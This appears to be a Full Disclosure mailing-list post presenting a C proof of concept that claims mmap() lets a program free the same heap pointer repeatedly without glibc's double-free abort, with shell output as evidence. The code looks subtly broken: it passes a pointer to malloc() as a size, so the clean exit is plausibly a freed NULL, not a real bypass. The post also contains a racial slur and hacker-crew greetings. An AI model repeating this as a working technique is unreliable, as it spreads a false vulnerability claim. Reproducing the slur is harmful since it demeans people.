Re: [FD] new email; gw22067@hotmail.com | Double-free segfault bypass

Tue, 27 Mar 2018 10:33:39 -0700 

Tested on: Ubuntu 14.04.5 LTS
Version: 4.04

On 24 March 2018 at 18:11, keliikoa kirland <keliikoakirl...@gmail.com>
wrote:

> Details from old email:
> =========================================
> "Double-Free bypass PoC is self-explanatory as well; 2 free's equate to a
> double-free heap corruption segfault; using mmap() disables that segfault
> and allows more than 1 free on any malloc'd/mmap'd variable. You can free
> `x` 4+ times and it'll still exit cleanly. brk() has already been patched;
> which is why i put // 1day next to it; same misalignment/technique to
> mmap() which is still vuln/can be abused to write use-after-free's without
> having the need to bypass heap corruption segfaults."  brk() was equal to
> mmap() in PoC below; mmap() --> brk() --> free() --> free() --> clean exit;
> now just mmap() --> free() --> free()
>
> PoC:
> =========================================
> joe@ubuntu:~$ cat test1.c
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/mman.h>
>
> int main(void){
>     void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED |
> MAP_ANONYMOUS, 0, 0);
>
>     void *z = malloc(p);
>     free(z);
>     free(z);
> }
>
> joe@ubuntu:~$ ./test1
> *** Error in `./test1': double free or corruption (top): 0x08332008 ***
> Aborted (core dumped)
>
> joe@ubuntu:~$ cat test1.c
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/mman.h>
>
> int main(void){
>     void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED |
> MAP_ANONYMOUS, 0, 0);
>     p = mmap(0x2000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED |
> MAP_ANONYMOUS, 0, 0);
>
>     void *z = malloc(p);
>     free(z);
>     free(z);
> }
>
> joe@ubuntu:~$ ./test1
> joe@ubuntu:~$ bl1ng bl1ng n1gg4z ;PppPpP
>
> References/Credits/Greetz:
> =========================================
> ac1db1tch3z koa
> https://github.com/x0r1
> http://steamcommunity.com/profiles/76561198333157214/
>
>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Reply via email to